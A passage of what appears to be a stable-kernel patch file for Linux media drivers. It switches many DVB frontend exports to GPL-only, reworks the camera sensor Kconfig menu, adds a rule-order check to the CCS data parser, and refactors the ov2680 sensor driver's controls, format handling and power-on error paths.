++++ b/drivers/media/dvb-frontends/tda10048.c
+@@ -1138,7 +1138,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(tda10048_attach);
++EXPORT_SYMBOL_GPL(tda10048_attach);
+ 
+ static const struct dvb_frontend_ops tda10048_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/tda1004x.c b/drivers/media/dvb-frontends/tda1004x.c
+index 83a798ca9b002..6f306db6c615f 100644
+--- a/drivers/media/dvb-frontends/tda1004x.c
++++ b/drivers/media/dvb-frontends/tda1004x.c
+@@ -1378,5 +1378,5 @@ MODULE_DESCRIPTION("Philips TDA10045H & TDA10046H DVB-T Demodulator");
+ MODULE_AUTHOR("Andrew de Quincey & Robert Schlabbach");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10045_attach);
+-EXPORT_SYMBOL(tda10046_attach);
++EXPORT_SYMBOL_GPL(tda10045_attach);
++EXPORT_SYMBOL_GPL(tda10046_attach);
+diff --git a/drivers/media/dvb-frontends/tda10086.c b/drivers/media/dvb-frontends/tda10086.c
+index cdcf97664bba8..b449514ae5854 100644
+--- a/drivers/media/dvb-frontends/tda10086.c
++++ b/drivers/media/dvb-frontends/tda10086.c
+@@ -764,4 +764,4 @@ MODULE_DESCRIPTION("Philips TDA10086 DVB-S Demodulator");
+ MODULE_AUTHOR("Andrew de Quincey");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10086_attach);
++EXPORT_SYMBOL_GPL(tda10086_attach);
+diff --git a/drivers/media/dvb-frontends/tda665x.c b/drivers/media/dvb-frontends/tda665x.c
+index 13e8969da7f89..346be5011fb73 100644
+--- a/drivers/media/dvb-frontends/tda665x.c
++++ b/drivers/media/dvb-frontends/tda665x.c
+@@ -227,7 +227,7 @@ struct dvb_frontend *tda665x_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tda665x_attach);
++EXPORT_SYMBOL_GPL(tda665x_attach);
+ 
+ MODULE_DESCRIPTION("TDA665x driver");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/tda8083.c b/drivers/media/dvb-frontends/tda8083.c
+index e3e1c3db2c856..44f53624557bc 100644
+--- a/drivers/media/dvb-frontends/tda8083.c
++++ b/drivers/media/dvb-frontends/tda8083.c
+@@ -481,4 +481,4 @@ MODULE_DESCRIPTION("Philips TDA8083 DVB-S Demodulator");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda8083_attach);
++EXPORT_SYMBOL_GPL(tda8083_attach);
+diff --git a/drivers/media/dvb-frontends/tda8261.c b/drivers/media/dvb-frontends/tda8261.c
+index 0d576d41c67d8..8b06f92745dca 100644
+--- a/drivers/media/dvb-frontends/tda8261.c
++++ b/drivers/media/dvb-frontends/tda8261.c
+@@ -188,7 +188,7 @@ exit:
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(tda8261_attach);
++EXPORT_SYMBOL_GPL(tda8261_attach);
+ 
+ MODULE_AUTHOR("Manu Abraham");
+ MODULE_DESCRIPTION("TDA8261 8PSK/QPSK Tuner");
+diff --git a/drivers/media/dvb-frontends/tda826x.c b/drivers/media/dvb-frontends/tda826x.c
+index f9703a1dd758c..eafcf5f7da3dc 100644
+--- a/drivers/media/dvb-frontends/tda826x.c
++++ b/drivers/media/dvb-frontends/tda826x.c
+@@ -164,7 +164,7 @@ struct dvb_frontend *tda826x_attach(struct dvb_frontend *fe, int addr, struct i2
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tda826x_attach);
++EXPORT_SYMBOL_GPL(tda826x_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/ts2020.c b/drivers/media/dvb-frontends/ts2020.c
+index 02338256b974f..2f64f1a8bc233 100644
+--- a/drivers/media/dvb-frontends/ts2020.c
++++ b/drivers/media/dvb-frontends/ts2020.c
+@@ -525,7 +525,7 @@ struct dvb_frontend *ts2020_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(ts2020_attach);
++EXPORT_SYMBOL_GPL(ts2020_attach);
+ 
+ /*
+  * We implement own regmap locking due to legacy DVB attach which uses frontend
+diff --git a/drivers/media/dvb-frontends/tua6100.c b/drivers/media/dvb-frontends/tua6100.c
+index 2483f614d0e7d..41dd9b6d31908 100644
+--- a/drivers/media/dvb-frontends/tua6100.c
++++ b/drivers/media/dvb-frontends/tua6100.c
+@@ -186,7 +186,7 @@ struct dvb_frontend *tua6100_attach(struct dvb_frontend *fe, int addr, struct i2
+ 	fe->tuner_priv = priv;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tua6100_attach);
++EXPORT_SYMBOL_GPL(tua6100_attach);
+ 
+ MODULE_DESCRIPTION("DVB tua6100 driver");
+ MODULE_AUTHOR("Andrew de Quincey");
+diff --git a/drivers/media/dvb-frontends/ves1820.c b/drivers/media/dvb-frontends/ves1820.c
+index 9df14d0be1c1a..ee5620e731e9b 100644
+--- a/drivers/media/dvb-frontends/ves1820.c
++++ b/drivers/media/dvb-frontends/ves1820.c
+@@ -434,4 +434,4 @@ MODULE_DESCRIPTION("VLSI VES1820 DVB-C Demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(ves1820_attach);
++EXPORT_SYMBOL_GPL(ves1820_attach);
+diff --git a/drivers/media/dvb-frontends/ves1x93.c b/drivers/media/dvb-frontends/ves1x93.c
+index b747272863025..c60e21d26b881 100644
+--- a/drivers/media/dvb-frontends/ves1x93.c
++++ b/drivers/media/dvb-frontends/ves1x93.c
+@@ -540,4 +540,4 @@ MODULE_DESCRIPTION("VLSI VES1x93 DVB-S Demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(ves1x93_attach);
++EXPORT_SYMBOL_GPL(ves1x93_attach);
+diff --git a/drivers/media/dvb-frontends/zl10036.c b/drivers/media/dvb-frontends/zl10036.c
+index d392c7cce2ce0..7ba575e9c55f4 100644
+--- a/drivers/media/dvb-frontends/zl10036.c
++++ b/drivers/media/dvb-frontends/zl10036.c
+@@ -496,7 +496,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(zl10036_attach);
++EXPORT_SYMBOL_GPL(zl10036_attach);
+ 
+ module_param_named(debug, zl10036_debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/zl10039.c b/drivers/media/dvb-frontends/zl10039.c
+index 1335bf78d5b7f..a3e4d219400ce 100644
+--- a/drivers/media/dvb-frontends/zl10039.c
++++ b/drivers/media/dvb-frontends/zl10039.c
+@@ -295,7 +295,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(zl10039_attach);
++EXPORT_SYMBOL_GPL(zl10039_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/zl10353.c b/drivers/media/dvb-frontends/zl10353.c
+index 2a2cf20a73d61..8849d05475c27 100644
+--- a/drivers/media/dvb-frontends/zl10353.c
++++ b/drivers/media/dvb-frontends/zl10353.c
+@@ -665,4 +665,4 @@ MODULE_DESCRIPTION("Zarlink ZL10353 DVB-T demodulator driver");
+ MODULE_AUTHOR("Chris Pascoe");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(zl10353_attach);
++EXPORT_SYMBOL_GPL(zl10353_attach);
+diff --git a/drivers/media/i2c/Kconfig b/drivers/media/i2c/Kconfig
+index 7806d4b81716e..a34afb5217ebc 100644
+--- a/drivers/media/i2c/Kconfig
++++ b/drivers/media/i2c/Kconfig
+@@ -25,8 +25,15 @@ config VIDEO_IR_I2C
+ # V4L2 I2C drivers that are related with Camera support
+ #
+ 
+-menu "Camera sensor devices"
+-	visible if MEDIA_CAMERA_SUPPORT
++menuconfig VIDEO_CAMERA_SENSOR
++	bool "Camera sensor devices"
++	depends on MEDIA_CAMERA_SUPPORT && I2C
++	select MEDIA_CONTROLLER
++	select V4L2_FWNODE
++	select VIDEO_V4L2_SUBDEV_API
++	default y
++
++if VIDEO_CAMERA_SENSOR
+ 
+ config VIDEO_APTINA_PLL
+ 	tristate
+@@ -783,7 +790,7 @@ source "drivers/media/i2c/ccs/Kconfig"
+ source "drivers/media/i2c/et8ek8/Kconfig"
+ source "drivers/media/i2c/m5mols/Kconfig"
+ 
+-endmenu
++endif
+ 
+ menu "Lens drivers"
+ 	visible if MEDIA_CAMERA_SUPPORT
+diff --git a/drivers/media/i2c/ad5820.c b/drivers/media/i2c/ad5820.c
+index a12fedcc3a1ce..088c29c4e2529 100644
+--- a/drivers/media/i2c/ad5820.c
++++ b/drivers/media/i2c/ad5820.c
+@@ -356,7 +356,6 @@ static void ad5820_remove(struct i2c_client *client)
+ static const struct i2c_device_id ad5820_id_table[] = {
+ 	{ "ad5820", 0 },
+ 	{ "ad5821", 0 },
+-	{ "ad5823", 0 },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(i2c, ad5820_id_table);
+@@ -364,7 +363,6 @@ MODULE_DEVICE_TABLE(i2c, ad5820_id_table);
+ static const struct of_device_id ad5820_of_table[] = {
+ 	{ .compatible = "adi,ad5820" },
+ 	{ .compatible = "adi,ad5821" },
+-	{ .compatible = "adi,ad5823" },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, ad5820_of_table);
+diff --git a/drivers/media/i2c/ccs/ccs-data.c b/drivers/media/i2c/ccs/ccs-data.c
+index 45f2b2f55ec5c..08400edf77ced 100644
+--- a/drivers/media/i2c/ccs/ccs-data.c
++++ b/drivers/media/i2c/ccs/ccs-data.c
+@@ -464,8 +464,7 @@ static int ccs_data_parse_rules(struct bin_container *bin,
+ 		rule_payload = __rule_type + 1;
+ 		rule_plen2 = rule_plen - sizeof(*__rule_type);
+ 
+-		switch (*__rule_type) {
+-		case CCS_DATA_BLOCK_RULE_ID_IF: {
++		if (*__rule_type == CCS_DATA_BLOCK_RULE_ID_IF) {
+ 			const struct __ccs_data_block_rule_if *__if_rules =
+ 				rule_payload;
+ 			const size_t __num_if_rules =
+@@ -514,49 +513,61 @@ static int ccs_data_parse_rules(struct bin_container *bin,
+ 				rules->if_rules = if_rule;
+ 				rules->num_if_rules = __num_if_rules;
+ 			}
+-			break;
+-		}
+-		case CCS_DATA_BLOCK_RULE_ID_READ_ONLY_REGS:
+-			rval = ccs_data_parse_reg_rules(bin, &rules->read_only_regs,
+-							&rules->num_read_only_regs,
+-							rule_payload,
+-							rule_payload + rule_plen2,
+-							dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		case CCS_DATA_BLOCK_RULE_ID_FFD:
+-			rval = ccs_data_parse_ffd(bin, &rules->frame_format,
+-						  rule_payload,
+-						  rule_payload + rule_plen2,
+-						  dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		case CCS_DATA_BLOCK_RULE_ID_MSR:
+-			rval = ccs_data_parse_reg_rules(bin,
+-							&rules->manufacturer_regs,
+-							&rules->num_manufacturer_regs,
+-							rule_payload,
+-							rule_payload + rule_plen2,
+-							dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		case CCS_DATA_BLOCK_RULE_ID_PDAF_READOUT:
+-			rval = ccs_data_parse_pdaf_readout(bin,
+-							   &rules->pdaf_readout,
+-							   rule_payload,
+-							   rule_payload + rule_plen2,
+-							   dev);
+-			if (rval)
+-				return rval;
+-			break;
+-		default:
+-			dev_dbg(dev,
+-				"Don't know how to handle rule type %u!\n",
+-				*__rule_type);
+-			return -EINVAL;
++		} else {
++			/* Check there was an if rule before any other rules */
++			if (bin->base && !rules)
++				return -EINVAL;
++
++			switch (*__rule_type) {
++			case CCS_DATA_BLOCK_RULE_ID_READ_ONLY_REGS:
++				rval = ccs_data_parse_reg_rules(bin,
++								rules ?
++								&rules->read_only_regs : NULL,
++								rules ?
++								&rules->num_read_only_regs : NULL,
++								rule_payload,
++								rule_payload + rule_plen2,
++								dev);
++				if (rval)
++					return rval;
++				break;
++			case CCS_DATA_BLOCK_RULE_ID_FFD:
++				rval = ccs_data_parse_ffd(bin, rules ?
++							  &rules->frame_format : NULL,
++							  rule_payload,
++							  rule_payload + rule_plen2,
++							  dev);
++				if (rval)
++					return rval;
++				break;
++			case CCS_DATA_BLOCK_RULE_ID_MSR:
++				rval = ccs_data_parse_reg_rules(bin,
++								rules ?
++								&rules->manufacturer_regs : NULL,
++								rules ?
++								&rules->num_manufacturer_regs : NULL,
++								rule_payload,
++								rule_payload + rule_plen2,
++								dev);
++				if (rval)
++					return rval;
++				break;
++			case CCS_DATA_BLOCK_RULE_ID_PDAF_READOUT:
++				rval = ccs_data_parse_pdaf_readout(bin,
++								   rules ?
++								   &rules->pdaf_readout : NULL,
++								   rule_payload,
++								   rule_payload + rule_plen2,
++								   dev);
++				if (rval)
++					return rval;
++				break;
++			default:
++				dev_dbg(dev,
++					"Don't know how to handle rule type %u!\n",
++					*__rule_type);
++				return -EINVAL;
++			}
+ 		}
+ 		__next_rule = __next_rule + rule_hlen + rule_plen;
+ 	}
+diff --git a/drivers/media/i2c/ov2680.c b/drivers/media/i2c/ov2680.c
+index de66d3395a4dd..8943e4e78a0df 100644
+--- a/drivers/media/i2c/ov2680.c
++++ b/drivers/media/i2c/ov2680.c
+@@ -54,6 +54,9 @@
+ #define OV2680_WIDTH_MAX		1600
+ #define OV2680_HEIGHT_MAX		1200
+ 
++#define OV2680_DEFAULT_WIDTH			800
++#define OV2680_DEFAULT_HEIGHT			600
++
+ enum ov2680_mode_id {
+ 	OV2680_MODE_QUXGA_800_600,
+ 	OV2680_MODE_720P_1280_720,
+@@ -85,15 +88,8 @@ struct ov2680_mode_info {
+ 
+ struct ov2680_ctrls {
+ 	struct v4l2_ctrl_handler handler;
+-	struct {
+-		struct v4l2_ctrl *auto_exp;
+-		struct v4l2_ctrl *exposure;
+-	};
+-	struct {
+-		struct v4l2_ctrl *auto_gain;
+-		struct v4l2_ctrl *gain;
+-	};
+-
++	struct v4l2_ctrl *exposure;
++	struct v4l2_ctrl *gain;
+ 	struct v4l2_ctrl *hflip;
+ 	struct v4l2_ctrl *vflip;
+ 	struct v4l2_ctrl *test_pattern;
+@@ -143,6 +139,7 @@ static const struct reg_value ov2680_setting_30fps_QUXGA_800_600[] = {
+ 	{0x380e, 0x02}, {0x380f, 0x84}, {0x3811, 0x04}, {0x3813, 0x04},
+ 	{0x3814, 0x31}, {0x3815, 0x31}, {0x3820, 0xc0}, {0x4008, 0x00},
+ 	{0x4009, 0x03}, {0x4837, 0x1e}, {0x3501, 0x4e}, {0x3502, 0xe0},
++	{0x3503, 0x03},
+ };
+ 
+ static const struct reg_value ov2680_setting_30fps_720P_1280_720[] = {
+@@ -321,70 +318,62 @@ static void ov2680_power_down(struct ov2680_dev *sensor)
+ 	usleep_range(5000, 10000);
+ }
+ 
+-static int ov2680_bayer_order(struct ov2680_dev *sensor)
++static void ov2680_set_bayer_order(struct ov2680_dev *sensor,
++				   struct v4l2_mbus_framefmt *fmt)
+ {
+-	u32 format1;
+-	u32 format2;
+-	u32 hv_flip;
+-	int ret;
+-
+-	ret = ov2680_read_reg(sensor, OV2680_REG_FORMAT1, &format1);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = ov2680_read_reg(sensor, OV2680_REG_FORMAT2, &format2);
+-	if (ret < 0)
+-		return ret;
++	int hv_flip = 0;
+ 
+-	hv_flip = (format2 & BIT(2)  << 1) | (format1 & BIT(2));
++	if (sensor->ctrls.vflip && sensor->ctrls.vflip->val)
++		hv_flip += 1;
+ 
+-	sensor->fmt.code = ov2680_hv_flip_bayer_order[hv_flip];
++	if (sensor->ctrls.hflip && sensor->ctrls.hflip->val)
++		hv_flip += 2;
+ 
+-	return 0;
++	fmt->code = ov2680_hv_flip_bayer_order[hv_flip];
+ }
+ 
+-static int ov2680_vflip_enable(struct ov2680_dev *sensor)
++static void ov2680_fill_format(struct ov2680_dev *sensor,
++			       struct v4l2_mbus_framefmt *fmt,
++			       unsigned int width, unsigned int height)
+ {
+-	int ret;
+-
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT1, BIT(2), BIT(2));
+-	if (ret < 0)
+-		return ret;
+-
+-	return ov2680_bayer_order(sensor);
++	memset(fmt, 0, sizeof(*fmt));
++	fmt->width = width;
++	fmt->height = height;
++	fmt->field = V4L2_FIELD_NONE;
++	fmt->colorspace = V4L2_COLORSPACE_SRGB;
++	ov2680_set_bayer_order(sensor, fmt);
+ }
+ 
+-static int ov2680_vflip_disable(struct ov2680_dev *sensor)
++static int ov2680_set_vflip(struct ov2680_dev *sensor, s32 val)
+ {
+ 	int ret;
+ 
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT1, BIT(2), BIT(0));
+-	if (ret < 0)
+-		return ret;
+-
+-	return ov2680_bayer_order(sensor);
+-}
+-
+-static int ov2680_hflip_enable(struct ov2680_dev *sensor)
+-{
+-	int ret;
++	if (sensor->is_streaming)
++		return -EBUSY;
+ 
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT2, BIT(2), BIT(2));
++	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT1,
++			     BIT(2), val ? BIT(2) : 0);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return ov2680_bayer_order(sensor);
++	ov2680_set_bayer_order(sensor, &sensor->fmt);
++	return 0;
+ }
+ 
+-static int ov2680_hflip_disable(struct ov2680_dev *sensor)
++static int ov2680_set_hflip(struct ov2680_dev *sensor, s32 val)
+ {
+ 	int ret;
+ 
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT2, BIT(2), BIT(0));
++	if (sensor->is_streaming)
++		return -EBUSY;
++
++	ret = ov2680_mod_reg(sensor, OV2680_REG_FORMAT2,
++			     BIT(2), val ? BIT(2) : 0);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return ov2680_bayer_order(sensor);
++	ov2680_set_bayer_order(sensor, &sensor->fmt);
++	return 0;
+ }
+ 
+ static int ov2680_test_pattern_set(struct ov2680_dev *sensor, int value)
+@@ -405,69 +394,15 @@ static int ov2680_test_pattern_set(struct ov2680_dev *sensor, int value)
+ 	return 0;
+ }
+ 
+-static int ov2680_gain_set(struct ov2680_dev *sensor, bool auto_gain)
++static int ov2680_gain_set(struct ov2680_dev *sensor, u32 gain)
+ {
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+-	u32 gain;
+-	int ret;
+-
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_R_MANUAL, BIT(1),
+-			     auto_gain ? 0 : BIT(1));
+-	if (ret < 0)
+-		return ret;
+-
+-	if (auto_gain || !ctrls->gain->is_new)
+-		return 0;
+-
+-	gain = ctrls->gain->val;
+-
+-	ret = ov2680_write_reg16(sensor, OV2680_REG_GAIN_PK, gain);
+-
+-	return 0;
+-}
+-
+-static int ov2680_gain_get(struct ov2680_dev *sensor)
+-{
+-	u32 gain;
+-	int ret;
+-
+-	ret = ov2680_read_reg16(sensor, OV2680_REG_GAIN_PK, &gain);
+-	if (ret)
+-		return ret;
+-
+-	return gain;
+-}
+-
+-static int ov2680_exposure_set(struct ov2680_dev *sensor, bool auto_exp)
+-{
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+-	u32 exp;
+-	int ret;
+-
+-	ret = ov2680_mod_reg(sensor, OV2680_REG_R_MANUAL, BIT(0),
+-			     auto_exp ? 0 : BIT(0));
+-	if (ret < 0)
+-		return ret;
+-
+-	if (auto_exp || !ctrls->exposure->is_new)
+-		return 0;
+-
+-	exp = (u32)ctrls->exposure->val;
+-	exp <<= 4;
+-
+-	return ov2680_write_reg24(sensor, OV2680_REG_EXPOSURE_PK_HIGH, exp);
++	return ov2680_write_reg16(sensor, OV2680_REG_GAIN_PK, gain);
+ }
+ 
+-static int ov2680_exposure_get(struct ov2680_dev *sensor)
++static int ov2680_exposure_set(struct ov2680_dev *sensor, u32 exp)
+ {
+-	int ret;
+-	u32 exp;
+-
+-	ret = ov2680_read_reg24(sensor, OV2680_REG_EXPOSURE_PK_HIGH, &exp);
+-	if (ret)
+-		return ret;
+-
+-	return exp >> 4;
++	return ov2680_write_reg24(sensor, OV2680_REG_EXPOSURE_PK_HIGH,
++				  exp << 4);
+ }
+ 
+ static int ov2680_stream_enable(struct ov2680_dev *sensor)
+@@ -482,33 +417,17 @@ static int ov2680_stream_disable(struct ov2680_dev *sensor)
+ 
+ static int ov2680_mode_set(struct ov2680_dev *sensor)
+ {
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+ 	int ret;
+ 
+-	ret = ov2680_gain_set(sensor, false);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = ov2680_exposure_set(sensor, false);
++	ret = ov2680_load_regs(sensor, sensor->current_mode);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = ov2680_load_regs(sensor, sensor->current_mode);
++	/* Restore value of all ctrls */
++	ret = __v4l2_ctrl_handler_setup(&sensor->ctrls.handler);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (ctrls->auto_gain->val) {
+-		ret = ov2680_gain_set(sensor, true);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	if (ctrls->auto_exp->val == V4L2_EXPOSURE_AUTO) {
+-		ret = ov2680_exposure_set(sensor, true);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+ 	sensor->mode_pending_changes = false;
+ 
+ 	return 0;
+@@ -556,7 +475,7 @@ static int ov2680_power_on(struct ov2680_dev *sensor)
+ 		ret = ov2680_write_reg(sensor, OV2680_REG_SOFT_RESET, 0x01);
+ 		if (ret != 0) {
+ 			dev_err(dev, "sensor soft reset failed\n");
+-			return ret;
++			goto err_disable_regulators;
+ 		}
+ 		usleep_range(1000, 2000);
+ 	} else {
+@@ -566,7 +485,7 @@ static int ov2680_power_on(struct ov2680_dev *sensor)
+ 
+ 	ret = clk_prepare_enable(sensor->xvclk);
+ 	if (ret < 0)
+-		return ret;
++		goto err_disable_regulators;
+ 
+ 	sensor->is_enabled = true;
+ 
+@@ -576,6 +495,10 @@ static int ov2680_power_on(struct ov2680_dev *sensor)
+ 	ov2680_stream_disable(sensor);
+ 
+ 	return 0;
++
++err_disable_regulators:
++	regulator_bulk_disable(OV2680_NUM_SUPPLIES, sensor->supplies);
++	return ret;
+ }
+ 
+ static int ov2680_s_power(struct v4l2_subdev *sd, int on)
+@@ -590,15 +513,10 @@ static int ov2680_s_power(struct v4l2_subdev *sd, int on)
+ 	else
+ 		ret = ov2680_power_off(sensor);
+ 
+-	mutex_unlock(&sensor->lock);
+-
+-	if (on && ret == 0) {
+-		ret = v4l2_ctrl_handler_setup(&sensor->ctrls.handler);
+-		if (ret < 0)
+-			return ret;
+-
++	if (on && ret == 0)
+ 		ret = ov2680_mode_restore(sensor);
+-	}
++
++	mutex_unlock(&sensor->lock);
+ 
+ 	return ret;
+ }
+@@ -664,7 +582,6 @@ static int ov2680_get_fmt(struct v4l2_subdev *sd,
+ {
+ 	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+ 	struct v4l2_mbus_framefmt *fmt = NULL;
+-	int ret = 0;
+ 
+ 	if (format->pad != 0)
+ 		return -EINVAL;
+@@ -672,22 +589,17 @@ static int ov2680_get_fmt(struct v4l2_subdev *sd,
+ 	mutex_lock(&sensor->lock);
+ 
+ 	if (format->which == V4L2_SUBDEV_FORMAT_TRY) {
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 		fmt = v4l2_subdev_get_try_format(&sensor->sd, sd_state,
+ 						 format->pad);
+-#else
+-		ret = -EINVAL;
+-#endif
+ 	} else {
+ 		fmt = &sensor->fmt;
+ 	}
+ 
+-	if (fmt)
+-		format->format = *fmt;
++	format->format = *fmt;
+ 
+ 	mutex_unlock(&sensor->lock);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int ov2680_set_fmt(struct v4l2_subdev *sd,
+@@ -695,43 +607,35 @@ static int ov2680_set_fmt(struct v4l2_subdev *sd,
+ 			  struct v4l2_subdev_format *format)
+ {
+ 	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+-	struct v4l2_mbus_framefmt *fmt = &format->format;
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 	struct v4l2_mbus_framefmt *try_fmt;
+-#endif
+ 	const struct ov2680_mode_info *mode;
+ 	int ret = 0;
+ 
+ 	if (format->pad != 0)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&sensor->lock);
+-
+-	if (sensor->is_streaming) {
+-		ret = -EBUSY;
+-		goto unlock;
+-	}
+-
+ 	mode = v4l2_find_nearest_size(ov2680_mode_data,
+-				      ARRAY_SIZE(ov2680_mode_data), width,
+-				      height, fmt->width, fmt->height);
+-	if (!mode) {
+-		ret = -EINVAL;
+-		goto unlock;
+-	}
++				      ARRAY_SIZE(ov2680_mode_data),
++				      width, height,
++				      format->format.width,
++				      format->format.height);
++	if (!mode)
++		return -EINVAL;
++
++	ov2680_fill_format(sensor, &format->format, mode->width, mode->height);
+ 
+ 	if (format->which == V4L2_SUBDEV_FORMAT_TRY) {
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 		try_fmt = v4l2_subdev_get_try_format(sd, sd_state, 0);
+-		format->format = *try_fmt;
+-#endif
+-		goto unlock;
++		*try_fmt = format->format;
++		return 0;
+ 	}
+ 
+-	fmt->width = mode->width;
+-	fmt->height = mode->height;
+-	fmt->code = sensor->fmt.code;
+-	fmt->colorspace = sensor->fmt.colorspace;
++	mutex_lock(&sensor->lock);
++
++	if (sensor->is_streaming) {
++		ret = -EBUSY;
++		goto unlock;
++	}
+ 
+ 	sensor->current_mode = mode;
+ 	sensor->fmt = format->format;
+@@ -746,16 +650,11 @@ unlock:
+ static int ov2680_init_cfg(struct v4l2_subdev *sd,
+ 			   struct v4l2_subdev_state *sd_state)
+ {
+-	struct v4l2_subdev_format fmt = {
+-		.which = sd_state ? V4L2_SUBDEV_FORMAT_TRY
+-		: V4L2_SUBDEV_FORMAT_ACTIVE,
+-		.format = {
+-			.width = 800,
+-			.height = 600,
+-		}
+-	};
++	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+ 
+-	return ov2680_set_fmt(sd, sd_state, &fmt);
++	ov2680_fill_format(sensor, &sd_state->pads[0].try_fmt,
++			   OV2680_DEFAULT_WIDTH, OV2680_DEFAULT_HEIGHT);
++	return 0;
+ }
+ 
+ static int ov2680_enum_frame_size(struct v4l2_subdev *sd,
+@@ -794,66 +693,23 @@ static int ov2680_enum_frame_interval(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
+-static int ov2680_g_volatile_ctrl(struct v4l2_ctrl *ctrl)
+-{
+-	struct v4l2_subdev *sd = ctrl_to_sd(ctrl);
+-	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+-	int val;
+-
+-	if (!sensor->is_enabled)
+-		return 0;
+-
+-	switch (ctrl->id) {
+-	case V4L2_CID_GAIN:
+-		val = ov2680_gain_get(sensor);
+-		if (val < 0)
+-			return val;
+-		ctrls->gain->val = val;
+-		break;
+-	case V4L2_CID_EXPOSURE:
+-		val = ov2680_exposure_get(sensor);
+-		if (val < 0)
+-			return val;
+-		ctrls->exposure->val = val;
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+ static int ov2680_s_ctrl(struct v4l2_ctrl *ctrl)
+ {
+ 	struct v4l2_subdev *sd = ctrl_to_sd(ctrl);
+ 	struct ov2680_dev *sensor = to_ov2680_dev(sd);
+-	struct ov2680_ctrls *ctrls = &sensor->ctrls;
+ 
+ 	if (!sensor->is_enabled)
+ 		return 0;
+ 
+ 	switch (ctrl->id) {
+-	case V4L2_CID_AUTOGAIN:
+-		return ov2680_gain_set(sensor, !!ctrl->val);
+ 	case V4L2_CID_GAIN:
+-		return ov2680_gain_set(sensor, !!ctrls->auto_gain->val);
+-	case V4L2_CID_EXPOSURE_AUTO:
+-		return ov2680_exposure_set(sensor, !!ctrl->val);
++		return ov2680_gain_set(sensor, ctrl->val);
+ 	case V4L2_CID_EXPOSURE:
+-		return ov2680_exposure_set(sensor, !!ctrls->auto_exp->val);
++		return ov2680_exposure_set(sensor, ctrl->val);
+ 	case V4L2_CID_VFLIP:
+-		if (sensor->is_streaming)
+-			return -EBUSY;
+-		if (ctrl->val)
+-			return ov2680_vflip_enable(sensor);
+-		else
+-			return ov2680_vflip_disable(sensor);
++		return ov2680_set_vflip(sensor, ctrl->val);
+ 	case V4L2_CID_HFLIP:
+-		if (sensor->is_streaming)
+-			return -EBUSY;
+-		if (ctrl->val)
+-			return ov2680_hflip_enable(sensor);
+-		else
+-			return ov2680_hflip_disable(sensor);
++		return ov2680_set_hflip(sensor, ctrl->val);
+ 	case V4L2_CID_TEST_PATTERN:
+ 		return ov2680_test_pattern_set(sensor, ctrl->val);
+ 	default:
+@@ -864,7 +720,6 @@ static int ov2680_s_ctrl(struct v4l2_ctrl *ctrl)
+ }
+ 
+ static const struct v4l2_ctrl_ops ov2680_ctrl_ops = {
+-	.g_volatile_ctrl = ov2680_g_volatile_ctrl,
+ 	.s_ctrl = ov2680_s_ctrl,
+ };
+ 
